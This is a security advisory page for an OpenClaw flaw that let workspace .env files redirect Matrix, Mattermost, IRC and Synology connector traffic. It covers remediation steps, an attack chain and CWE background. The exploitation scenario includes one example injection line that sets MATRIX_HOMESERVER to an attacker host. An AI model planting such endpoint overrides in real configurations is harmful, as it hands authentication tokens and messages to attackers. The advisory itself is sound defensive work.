GHSA-55cf-xx38-4p9p: OpenClaw .env injection

Q: Is GHSA-55cf-xx38-4p9p actively exploited?

No confirmed active exploitation of GHSA-55cf-xx38-4p9p has been reported, but organizations should still patch proactively.

Q: How to fix GHSA-55cf-xx38-4p9p?

1. Patch immediately: Upgrade openclaw to 2026.4.22 — this is the only complete remediation. 2. Audit: Review all active workspace .env files for variables matching connector endpoint patterns including MATRIX_*, MATTERMOST_*, IRC_*, SYNOLOGY_*, and generic BASE_URL/API_HOST-style overrides. 3. Access control: Restrict .env file write permissions to operators only; treat workspace .env files as privileged configuration, not user-editable workspace state. 4. Detection: Alert on any change to connector endpoint variables in workspace config files, especially deviations from operator-defined values. 5. Credential rotation: If exposure is suspected, rotate authentication tokens for any Matrix, Mattermost, IRC, or Synology integrations that were active during the vulnerability window.

Q: What systems are affected by GHSA-55cf-xx38-4p9p?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, enterprise communication integrations, multi-tenant agent deployments.

Q: What is the CVSS score for GHSA-55cf-xx38-4p9p?

No CVSS score has been assigned yet.

CISO Take

OpenClaw ≤2026.4.21 allows workspace .env files to override connector endpoint variables for Matrix, Mattermost, IRC, and Synology integrations, silently redirecting all connector traffic to any host a workspace contributor specifies — with no error surfaced to operators. For organizations running OpenClaw in multi-user or shared-workspace configurations, this creates a low-effort path for a malicious insider or compromised contributor to intercept authentication tokens and message content from enterprise communication platforms. This vulnerability carries elevated weight given that OpenClaw has 135 tracked CVEs and AIID #1368 documents real-world credential exfiltration via its workspace trust model, establishing a demonstrated pattern of abuse in this exact attack surface. Upgrade to 2026.4.22 immediately, restrict .env write access to operators only, and audit all active workspace .env files for unexpected connector endpoint overrides.

Sources: GitHub Advisory ATLAS

What is the risk?

Medium absolute risk — no public exploit, no KEV listing, and only 4 downstream npm dependents limit raw blast radius. However the attack requires only workspace .env write access, making it trivially exploitable by any contributor with workspace-level permissions. In enterprise deployments integrating Matrix or Mattermost, successful exploitation silently establishes an authenticated MITM position against connector sessions with no visible error to operators or users. OpenClaw's history of 135 CVEs and a documented credential-theft incident via its workspace trust model elevates operational risk significantly beyond what EPSS scores alone would reflect.

How does the attack unfold?

Workspace Access

Adversary obtains write access to a target OpenClaw workspace .env file via a compromised contributor account, malicious insider, or poisoned workspace template.

AML.T0012

Config Injection

Adversary injects connector endpoint variables (e.g., MATRIX_HOMESERVER, MATTERMOST_URL, generic BASE_URL overrides) pointing to adversary-controlled infrastructure into the workspace .env file.

AML.T0081

Traffic Redirection

OpenClaw runtime initializes connectors using workspace .env values, silently routing all connector communications through adversary infrastructure with no error surfaced to operators or users.

AML.T0053

Credential Harvest

Adversary captures authentication tokens and message content from intercepted connector sessions, gaining persistent access to enterprise communication platforms.

AML.T0083

Workspace Access

Adversary obtains write access to a target OpenClaw workspace .env file via a compromised contributor account, malicious insider, or poisoned workspace template.

AML.T0012

Config Injection

Adversary injects connector endpoint variables (e.g., MATRIX_HOMESERVER, MATTERMOST_URL, generic BASE_URL overrides) pointing to adversary-controlled infrastructure into the workspace .env file.

AML.T0081

Traffic Redirection

OpenClaw runtime initializes connectors using workspace .env values, silently routing all connector communications through adversary infrastructure with no error surfaced to operators or users.

AML.T0053

Credential Harvest

Adversary captures authentication tokens and message content from intercepted connector sessions, gaining persistent access to enterprise communication platforms.

AML.T0083

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
OpenClaw	npm	<= 2026.4.21	`2026.4.22`
4 dependents 36% patched ~3d to patch Full package profile →

Do you use OpenClaw? You're affected.

How severe is it?

CVSS 3.1

N/A

EPSS

N/A

Exploitation Status

No known exploitation

Sophistication

Trivial

What should I do?

5 steps

Patch immediately: Upgrade openclaw to 2026.4.22 — this is the only complete remediation.
Audit: Review all active workspace .env files for variables matching connector endpoint patterns including MATRIX_*, MATTERMOST_*, IRC_*, SYNOLOGY_*, and generic BASE_URL/API_HOST-style overrides.
Access control: Restrict .env file write permissions to operators only; treat workspace .env files as privileged configuration, not user-editable workspace state.
Detection: Alert on any change to connector endpoint variables in workspace config files, especially deviations from operator-defined values.
Credential rotation: If exposure is suspected, rotate authentication tokens for any Matrix, Mattermost, IRC, or Synology integrations that were active during the vulnerability window.

How is it classified?

Supply Chain Auth Bypass Data Extraction Agent Plugin AML.T0053 - AI Agent Tool Invocation AML.T0081 - Modify AI Agent Configuration AML.T0083 - Credentials from AI Agent Configuration AML.T0086 - Exfiltration via AI Agent Tool Invocation

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 9 - Risk management system

ISO 42001

8.4 - AI system operation and monitoring

NIST AI RMF

MS-2.5 - AI system monitoring and logging

OWASP LLM Top 10

LLM06:2025 - Excessive Agency

Frequently Asked Questions

What is GHSA-55cf-xx38-4p9p?

OpenClaw ≤2026.4.21 allows workspace .env files to override connector endpoint variables for Matrix, Mattermost, IRC, and Synology integrations, silently redirecting all connector traffic to any host a workspace contributor specifies — with no error surfaced to operators. For organizations running OpenClaw in multi-user or shared-workspace configurations, this creates a low-effort path for a malicious insider or compromised contributor to intercept authentication tokens and message content from enterprise communication platforms. This vulnerability carries elevated weight given that OpenClaw has 135 tracked CVEs and AIID #1368 documents real-world credential exfiltration via its workspace trust model, establishing a demonstrated pattern of abuse in this exact attack surface. Upgrade to 2026.4.22 immediately, restrict .env write access to operators only, and audit all active workspace .env files for unexpected connector endpoint overrides.

Is GHSA-55cf-xx38-4p9p actively exploited?

No confirmed active exploitation of GHSA-55cf-xx38-4p9p has been reported, but organizations should still patch proactively.

How to fix GHSA-55cf-xx38-4p9p?

1. Patch immediately: Upgrade openclaw to 2026.4.22 — this is the only complete remediation. 2. Audit: Review all active workspace .env files for variables matching connector endpoint patterns including MATRIX_*, MATTERMOST_*, IRC_*, SYNOLOGY_*, and generic BASE_URL/API_HOST-style overrides. 3. Access control: Restrict .env file write permissions to operators only; treat workspace .env files as privileged configuration, not user-editable workspace state. 4. Detection: Alert on any change to connector endpoint variables in workspace config files, especially deviations from operator-defined values. 5. Credential rotation: If exposure is suspected, rotate authentication tokens for any Matrix, Mattermost, IRC, or Synology integrations that were active during the vulnerability window.

What systems are affected by GHSA-55cf-xx38-4p9p?

This vulnerability affects the following AI/ML architecture patterns: agent frameworks, enterprise communication integrations, multi-tenant agent deployments.

What is the CVSS score for GHSA-55cf-xx38-4p9p?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

agent frameworksenterprise communication integrationsmulti-tenant agent deployments

MITRE ATLAS Techniques

AML.T0053 AI Agent Tool Invocation

AML.T0081 Modify AI Agent Configuration

AML.T0083 Credentials from AI Agent Configuration

AML.T0086 Exfiltration via AI Agent Tool Invocation

Compliance Controls Affected

EU AI Act: Article 9

ISO 42001: 8.4

NIST AI RMF: MS-2.5

OWASP LLM Top 10: LLM06:2025

What are the technical details?

Original Advisory

## Summary Workspace dotenv files cannot override connector endpoint hosts. ## Affected Packages / Versions - Package: openclaw (npm) - Affected versions: <= 2026.4.21 - Fixed version: 2026.4.22 ## Impact A workspace .env file could set connector endpoint variables for Matrix, Mattermost, IRC, or Synology-related connectors and redirect runtime traffic away from the operator-configured endpoint. ## Fix Workspace .env loading now blocks those endpoint variables, including per-account Matrix homeserver suffixes and generic base-url/API-host style overrides. Trusted global runtime dotenv loading remains separate. ## Fix Commit(s) - 0623079e98abf7202591f1b04a89755eb7ec9272 ## Verification - The fix commit is contained in the public v2026.4.22 tag. - openclaw@2026.4.22 is published on npm and the compiled package contains the fix. - Focused regression coverage for this path passed before publication. OpenClaw thanks @qi-scape for reporting.

Exploitation Scenario

An adversary with write access to a shared OpenClaw workspace — obtained via a compromised contributor account, a malicious insider, or injection through a poisoned workspace template — adds connector endpoint variables to the workspace .env file pointing to adversary-controlled infrastructure (e.g., MATRIX_HOMESERVER=https://attacker.example.com). When OpenClaw initializes the Matrix connector, it resolves the workspace .env value over the operator-configured homeserver and establishes an authenticated session with the adversary's server. The adversary passively captures the Matrix authentication token and all subsequent message traffic. No error is raised to the operator. This maps directly to the AIID #1368 pattern where OpenClaw's workspace trust model was abused to deliver credential-stealing payloads — the same package, the same trust boundary, a lower-sophistication variant.

Weaknesses (CWE)

CWE-427 Uncontrolled Search Path Element Primary CWE-610 Externally Controlled Reference to a Resource in Another Sphere Primary

CWE-427 — Uncontrolled Search Path Element: The product uses a fixed or controlled search path to find resources, but one or more locations in that path can be under the control of unintended actors.

[Architecture and Design, Implementation] Hard-code the search path to a set of known-safe values (such as system directories), or only allow them to be specified by the administrator in a configuration file. Do not allow these settings to be modified by an external party. Be careful to avoid related weaknesses such as CWE-426 and CWE-428.
[Implementation] When invoking other programs, specify those programs using fully-qualified pathnames. While this is an effective approach, code that uses fully-qualified pathnames might not be portable to other systems that do not use the same pathnames. The portability can be improved by locating the full-qualified paths in a centralized, easily-modifiable location within the source code, and having the code refer to these paths.

Source: MITRE CWE corpus.